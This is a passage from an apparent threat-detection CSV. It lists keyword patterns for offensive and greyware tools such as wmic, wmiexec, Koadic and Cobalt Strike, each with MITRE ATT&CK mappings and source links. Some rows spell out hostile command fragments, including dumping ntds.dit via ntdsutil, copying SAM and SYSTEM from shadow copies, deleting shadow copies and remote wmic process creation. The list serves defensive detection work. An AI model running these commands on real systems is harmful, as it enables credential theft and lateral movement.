tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*wmap_crawler.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*wmeye.csproj*,offensive_tool_keyword,WMEye,WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement,T1210 - T1570,TA0001 - TA0002 - TA0003 - TA0004 - TA0009,N/A,N/A,POST Exploitation tools,https://github.com/pwn1sher/WMEye,1,1,N/A,N/A,4,334,54,2021-12-24T05:38:50Z,2021-09-07T08:18:30Z -*wmeye.exe *,offensive_tool_keyword,WMEye,WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement,T1210 - T1570,TA0001 - TA0002 - TA0003 - TA0004 - TA0009,N/A,N/A,POST Exploitation tools,https://github.com/pwn1sher/WMEye,1,0,N/A,N/A,4,334,54,2021-12-24T05:38:50Z,2021-09-07T08:18:30Z -*wmeye.sln*,offensive_tool_keyword,WMEye,WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement,T1210 - T1570,TA0001 - TA0002 - TA0003 - TA0004 - TA0009,N/A,N/A,POST Exploitation tools,https://github.com/pwn1sher/WMEye,1,1,N/A,N/A,4,334,54,2021-12-24T05:38:50Z,2021-09-07T08:18:30Z -*Wmi_Persistence.ps1*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*wmi_persistence.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*wmic /* /user:administrator process call create *cmd.exe /c *,greyware_tool_keyword,wmic,Lateral Movement with wmic,T1078 - T1028 - T1106 - T1105,TA0002 - TA0004,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*wmic process call create*ntdsutil *ac i ntds* ifm*create full*,greyware_tool_keyword,wmic,The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe,T1047 - T1005 - T1567.001,TA0002 - TA0003 - TA0007,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wmic SHADOWCOPY /nointeractive*,greyware_tool_keyword,wmic,VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.,T1490 - T1562.002,TA0040 - TA0007,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wmic shadowcopy call create Volume='C:\'*,offensive_tool_keyword,AD exploitation cheat sheet,Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. 
An elevated prompt is required for this.,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wmic useraccount get /ALL /format:csv*,greyware_tool_keyword,wmic,User Enumeration,T1087 - T1033,TA0006,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*wmic*/Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName*,greyware_tool_keyword,wmic,list AV products with wmic,T1518.001 - T1082,TA0007 - TA0005,N/A,N/A,Discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*wmic.exe process call create *.txt:*.exe*,greyware_tool_keyword,wmic,Execute a .EXE file stored as an Alternate Data Stream (ADS),T1105 - T1027.001 - T1096 - T1036,TA0002 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*wmic.exe* Shadowcopy Delete*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wmic/wmic.cmd*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*WMIcmd*,offensive_tool_keyword,WMIcmd,This tool allows us to execute commands via WMI and get information not otherwise available via this channel.,T1059.001 - T1021 - T1210.001,TA0002 - TA0007 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/nccgroup/WMIcmd,1,1,N/A,N/A,4,324,85,2017-06-24T18:37:16Z,2017-05-17T06:50:12Z -*WMICStager*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*wmi-event-lateral-movement.*,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,1,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*WMI-EventSub.cpp*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*wmiexec *.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*WMIExec.git*,offensive_tool_keyword,wmiexec,Set of python scripts which perform different ways of command execution via WMI protocol,T1047 - T1059 - T1070 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/WKL-Sec/wmiexec,1,1,N/A,N/A,2,145,21,2023-06-29T03:30:09Z,2023-06-21T13:15:04Z -*wmiexec.py -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*wmiexec_scheduledjob.py*,offensive_tool_keyword,wmiexec,Set of python scripts which perform different ways of command execution via WMI protocol,T1047 - T1059 - T1070 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/WKL-Sec/wmiexec,1,1,N/A,N/A,2,145,21,2023-06-29T03:30:09Z,2023-06-21T13:15:04Z -*wmiexec_win32process.py*,offensive_tool_keyword,wmiexec,Set of python scripts which perform different ways of command execution via WMI protocol,T1047 - T1059 - T1070 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/WKL-Sec/wmiexec,1,1,N/A,N/A,2,145,21,2023-06-29T03:30:09Z,2023-06-21T13:15:04Z -*wmiexec2.0.py*,offensive_tool_keyword,wmiexec2,wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*wmiexec2.py*,offensive_tool_keyword,wmiexec2,wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*wmiexec2-main*,offensive_tool_keyword,wmiexec2,wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*WMIExecHash.*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. 
multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*WMIExecHash.boo,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*WMIExec-main*,offensive_tool_keyword,wmiexec,Set of python scripts which perform different ways of command execution via WMI protocol,T1047 - T1059 - T1070 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/WKL-Sec/wmiexec,1,1,N/A,N/A,2,145,21,2023-06-29T03:30:09Z,2023-06-21T13:15:04Z -*wmiexec-Pro.git*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*wmiexec-pro.py*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*wmi-lateral-movement.*,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,1,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*WMImplant*,offensive_tool_keyword,WMImplant,WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.,T1021 - T1059 - T1047 - T1057 - T1049,TA0002 - TA0003 - TA0008 - TA0009 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/FortyNorthSecurity/WMImplant,1,1,N/A,N/A,8,767,152,2018-10-28T19:28:37Z,2016-05-24T14:00:14Z -*WMIPersist.*,offensive_tool_keyword,WMIPersistence,An example of how to perform WMI Event Subscription persistence using C#,T1547.008 - T1084 - T1053 - T1059.003,TA0003 - TA0004 - TA0002,N/A,N/A,Persistence,https://github.com/mdsecactivebreach/WMIPersistence,1,1,N/A,N/A,2,112,34,2019-05-29T09:48:46Z,2019-05-29T09:40:01Z -*wmipersist.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*wmipersistence.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*WMIPersistence.vbs*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*WMIPersistImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*WMI-ProcessCreate.cpp*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*WMIReg.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*wmispawn select*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*WmiSploit.git*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,1,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*WmiSploit-master/zip*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,1,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*WNFarmDynamite_h.cs*,offensive_tool_keyword,WindfarmDynamite,WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). 
Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread),T1055.013 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*word_gen_b_varlen.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*word_unc_injector.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Wordlist/ftp_p.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/ftp_u.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/ftp_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/mssql_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/mysql_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/oracle_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/pass.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential 
